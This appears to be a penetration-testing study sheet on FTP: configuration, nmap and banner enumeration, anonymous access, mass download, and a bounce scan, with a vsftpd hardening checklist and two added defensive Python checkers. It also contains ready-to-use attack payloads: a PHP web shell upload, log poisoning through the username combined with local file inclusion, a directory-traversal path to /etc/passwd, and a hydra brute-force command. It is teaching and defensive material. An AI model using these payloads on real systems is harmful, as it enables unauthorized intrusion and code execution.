FTP Characteristics:
- Ports: 21 (control), 20 (data)
- Protocol: TCP-based
- Authentication: Clear-text (unless FTPS)
- Modes: Active vs Passive
FTP Connection Types:
- Active FTP: Client opens control channel (port 21), server initiates data channel (port 20)
- Passive FTP: Client initiates both control and data channels (firewall-friendly)
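The PORT and PASV exchanges behind these two modes, as an added example (not code from the original page): it decodes the `h1,h2,h3,h4,p1,p2` host-port argument and goes one step further by flagging a PORT command that names an address other than the control-connection client, the condition behind the FTP bounce scan covered later on this page. Function names and sample lines are constructed for illustration.

```python
import re

def decode_hostport(arg):
    """Decode 'h1,h2,h3,h4,p1,p2' into (ip, port); port = p1*256 + p2."""
    parts = [int(x) for x in arg.strip().split(",")]
    if len(parts) != 6 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"bad host-port argument: {arg!r}")
    return ".".join(map(str, parts[:4])), parts[4] * 256 + parts[5]

def encode_hostport(ip, port):
    """Inverse of decode_hostport: build the argument an active-mode client sends."""
    return ",".join(ip.split(".") + [str(port >> 8), str(port & 0xFF)])

def parse_pasv_reply(line):
    """Extract (ip, port) from a '227 Entering Passive Mode (h1,...,p2).' reply."""
    m = re.match(r"227 .*?(\d+(?:,\d+){5})", line)
    if not m:
        raise ValueError("not a 227 reply")
    return decode_hostport(m.group(1))

def check_port_command(line, client_ip):
    """Return (ip, port, findings) for a PORT command seen on the control channel."""
    verb, _, arg = line.strip().partition(" ")
    if verb.upper() != "PORT":
        raise ValueError("not a PORT command")
    ip, port = decode_hostport(arg)
    findings = []
    if ip != client_ip:
        # In active mode the server should only connect back to the client itself
        findings.append("third-party address (possible FTP bounce)")
    if port < 1024:
        findings.append("privileged port requested")
    return ip, port, findings

# Constructed sample control-channel lines: (client address, command)
SAMPLE = [
    ("10.10.14.4", "PORT 10,10,14,4,195,80"),
    ("10.10.14.4", "PORT 192,168,1,100,0,22"),
]

if __name__ == "__main__":
    for client, cmd in SAMPLE:
        print(client, cmd, check_port_command(cmd, client))
    print(parse_pasv_reply("227 Entering Passive Mode (10,129,14,136,39,16)."))
```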
TFTP (Trivial FTP):
- Port: 69/UDP
- Authentication: None
- Features: Simplified, no directory listing
- Security: Local networks only
| Server | Description | Config File |
|---|---|---|
| vsftpd | Very Secure FTP Daemon | /etc/vsftpd.conf |
| ProFTPD | Professional FTP server | /etc/proftpd/proftpd.conf |
| Pure-FTPd | Secure FTP server | /etc/pure-ftpd/pure-ftpd.conf |
Installation and Setup:
```bash
sudo apt install vsftpd
cat /etc/vsftpd.conf | grep -v "#"
```
Key Configuration Settings:
| Setting | Value | Description |
|---|---|---|
| listen=NO | YES/NO | Run as standalone daemon? |
| anonymous_enable=NO | YES/NO | Allow anonymous access? |
| local_enable=YES | YES/NO | Allow local users to login? |
| write_enable=YES | YES/NO | Allow FTP write commands? |
| dirmessage_enable=YES | YES/NO | Display directory messages? |
| xferlog_enable=YES | YES/NO | Log uploads/downloads? |
| connect_from_port_20=YES | YES/NO | Use port 20 for data? |
| ssl_enable=NO | YES/NO | Enable SSL/TLS encryption? |
User Access Control:
```bash
# File controlling FTP access (users listed here are denied FTP login)
cat /etc/ftpusers
guest
john
kevin
```

```
anonymous_enable=YES            # Allow anonymous login
anon_upload_enable=YES          # Anonymous upload capability
anon_mkdir_write_enable=YES     # Anonymous directory creation
no_anon_password=YES            # No password required
anon_root=/home/username/ftp    # Anonymous user directory
write_enable=YES                # Enable write commands
```

```
hide_ids=YES                    # Hide real UIDs/GIDs (show as 'ftp')
ls_recurse_enable=YES           # Allow recursive listings
chroot_local_user=YES           # Jail users in home directory
chroot_list_enable=YES          # Use chroot list
```
Basic FTP Scan:
```bash
# Standard FTP scan
sudo nmap -sV -p21 -sC -A target_ip
# FTP-specific scripts (pattern quoted so the shell does not expand it)
sudo nmap -p21 --script "ftp-*" target_ip
```
Available Nmap FTP Scripts:
```bash
# Find FTP scripts
find /usr/share/nmap/scripts/ -name "*ftp*"
ftp-anon.nse                # Anonymous FTP testing
ftp-banner.nse              # Banner grabbing
ftp-bounce.nse              # FTP bounce attack testing
ftp-brute.nse               # FTP brute force
ftp-libopie.nse             # libopie buffer overflow
ftp-proftpd-backdoor.nse    # ProFTPD backdoor detection
ftp-syst.nse                # System information
ftp-vsftpd-backdoor.nse     # vsftpd backdoor detection
ftp-vuln-cve2010-4221.nse   # ProFTPD stack-based buffer overflow (CVE-2010-4221)
```
Example Nmap Output:
```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 1002     1002          220 Apr 16  2021 test.txt
|_Only these file types are allowed: txt, log, cfg
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
```

```bash
# Netcat banner grabbing
nc -nv target_ip 21
# Telnet banner grabbing
telnet target_ip 21
# Example response:
220 (vsFTPd 3.0.3)
```

```bash
# Basic anonymous login
ftp target_ip
# Username: anonymous
# Password: anonymous (or your email)
# Alternative anonymous credentials
# Username: ftp
# Password: ftp
# Successful anonymous login example:
Connected to target_ip.
220 (vsFTPd 3.0.3)
Name (target_ip:user): anonymous
331 Please specify the password.
Password: anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
Basic Commands:
```bash
# List files and directories
ftp> ls
ftp> dir
# Long format listing
ftp> ls -la
# Navigate directories
ftp> cd directory_name
ftp> pwd
# Download files
ftp> get filename.txt
ftp> mget *.txt
# Binary mode for executables/images
ftp> binary
ftp> get application.exe
```
Mass Download:
```bash
# Download all accessible files using wget
wget -m --no-passive ftp://anonymous:anonymous@target_ip
# Results in directory structure:
tree target_ip/
└── target_ip
    ├── Calendar.pptx
    ├── Clients
    │   └── Inlanefreight
    │       ├── appointments.xlsx
    │       ├── contract.docx
    │       └── meetings.txt
    └── Important Notes.txt
```
File Upload Testing:
```bash
# Create test file
touch testupload.txt
# Upload test
ftp> put testupload.txt
local: testupload.txt remote: testupload.txt
---> STOR testupload.txt
150 Ok to send data.
226 Transfer complete.
# Verify upload
ftp> ls
-rw-------    1 1002     133             0 Sep 15 14:57 testupload.txt
```
Connecting to FTPS:
```bash
# OpenSSL for FTPS connection
openssl s_client -connect target_ip:21 -starttls ftp
# Certificate information extraction
CONNECTED(00000003)
depth=0 C = US, ST = California, L = Sacramento, O = Inlanefreight, OU = Dev, CN = master.inlanefreight.htb, emailAddress = admin@inlanefreight.htb
```
Information from SSL Certificates:
- Hostname: master.inlanefreight.htb
- Organization: Inlanefreight
- Email: admin@inlanefreight.htb
- Location: Sacramento, California
Concept: Use FTP server as proxy for port scanning
```bash
# Nmap FTP bounce scan
nmap -b anonymous:password@ftp_server target_network
# Manual FTP bounce
ftp> port 192,168,1,100,0,22   # Target 192.168.1.100:22
ftp> list                      # Trigger connection
```
Common Configuration Weaknesses:
```
# Dangerous permission settings
-rwxrwxrwx files (world-writable)
drwxrwxrwx directories (world-writable)
# Information disclosure
hide_ids=NO (shows real UIDs/GIDs)
ls_recurse_enable=YES (allows recursive listing)
# Authentication bypasses
anonymous_enable=YES
no_anon_password=YES
```

- Risk: Unauthorized file access/upload
- Detection: `ftp-anon` Nmap script
- Exploitation: Mass download, malicious uploads
- Risk: Credential interception
- Detection: Network sniffing
- Mitigation: Use FTPS/SFTP
- Risk: Access outside FTP root
- Exploitation: `../../../etc/passwd`
- Detection: Manual testing
- Risk: Web shell upload
- Exploitation: Upload PHP/ASPX shells
- Impact: Remote code execution
```bash
# Create PHP web shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Upload to web-accessible FTP directory
ftp> put shell.php
# Access via web browser
http://target.com/ftp_dir/shell.php?cmd=id
```

```bash
# Inject code in FTP logs via username
ftp target_ip
# Username: <?php system($_GET['cmd']); ?>
# Include FTP log in LFI
http://target.com/page.php?file=/var/log/vsftpd.log&cmd=id
```

```bash
# Exploit writable config
ftp> put malicious.conf vsftpd.conf
# Service restart triggers malicious config
# Potential RCE or privilege escalation
```

- Port 21 TCP scan with version detection
- Anonymous access testing
- Banner grabbing and version identification
- SSL certificate analysis (if FTPS)
- Anonymous login attempt
- Default credentials testing
- Brute force attack (if applicable)
- User enumeration
- Directory listing permissions
- Recursive listing capabilities
- Hidden files/directories
- File permissions analysis
- Download capabilities
- Upload capabilities
- File modification permissions
- Directory creation permissions
- Directory traversal attempts
- FTP bounce attack testing
- Buffer overflow testing
- Configuration file access
```bash
# Built-in FTP client
ftp target_ip
# Netcat for raw interaction
nc -nv target_ip 21
# OpenSSL for FTPS
openssl s_client -connect target_ip:21 -starttls ftp
# Wget for mass download
wget -m --no-passive ftp://user:pass@target_ip
```

```bash
# Nmap with FTP scripts (pattern quoted so the shell does not expand it)
nmap -p21 --script "ftp-*" target_ip
# Hydra for brute forcing
hydra -l user -P passwords.txt ftp://target_ip
# FTP enumeration scripts
ftpmap -s target_ip
```

- Disable anonymous access unless required
- Use strong authentication mechanisms
- Implement SSL/TLS encryption (FTPS)
- Restrict file permissions and chroot users
- Log and monitor FTP activities
- Regular security updates and patches
- Firewall rules to restrict FTP access
- VPN requirements for external access
- Network segmentation for FTP servers
- Intrusion detection for FTP anomalies
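
One way to check a server against the hardening points above and the weak settings listed earlier, as an added example (not code from the original page or from the vsftpd project): it parses a `vsftpd.conf` and reports explicit risky values plus options left unset, which then depend on the daemon's defaults. The option names come from this page; the function names and the sample configuration are constructed.

```python
# option -> (value that counts as a finding, reason); options are those on this page
RISKY = {
    "anonymous_enable": ("YES", "anonymous login allowed"),
    "anon_upload_enable": ("YES", "anonymous upload allowed"),
    "anon_mkdir_write_enable": ("YES", "anonymous directory creation allowed"),
    "no_anon_password": ("YES", "anonymous login needs no password"),
    "ls_recurse_enable": ("YES", "recursive listings allowed"),
    "hide_ids": ("NO", "real UIDs/GIDs shown in listings"),
    "ssl_enable": ("NO", "control and data channels are clear-text"),
    "chroot_local_user": ("NO", "local users not jailed in home directory"),
    "xferlog_enable": ("NO", "transfers not logged"),
}

def parse_conf(text):
    """Parse option=value lines; skip '#' lines, drop trailing '# notes' as used on this page."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.split("#", 1)[0].strip()
    return settings

def audit(text):
    """Return (findings, unset): explicit risky values, and options left to daemon defaults."""
    s = parse_conf(text)
    on = lambda k: s.get(k, "").upper() == "YES"
    findings = [f"{k}={bad}: {why}" for k, (bad, why) in RISKY.items()
                if s.get(k, "").upper() == bad]
    writers = [k for k in ("anon_upload_enable", "anon_mkdir_write_enable") if on(k)]
    if on("anonymous_enable") and on("write_enable") and writers:
        findings.append("anonymous write path: write_enable=YES with " + ", ".join(writers))
    return findings, sorted(k for k in RISKY if k not in s)

# Constructed sample configuration (not taken from a real host)
SAMPLE_CONF = """\
anonymous_enable=YES # Allow anonymous login
anon_upload_enable=YES
no_anon_password=YES
write_enable=YES
hide_ids=YES
ssl_enable=NO
"""

if __name__ == "__main__":
    findings, unset = audit(SAMPLE_CONF)
    print("\n".join(findings))
    print("unset (check daemon defaults):", ", ".join(unset))
```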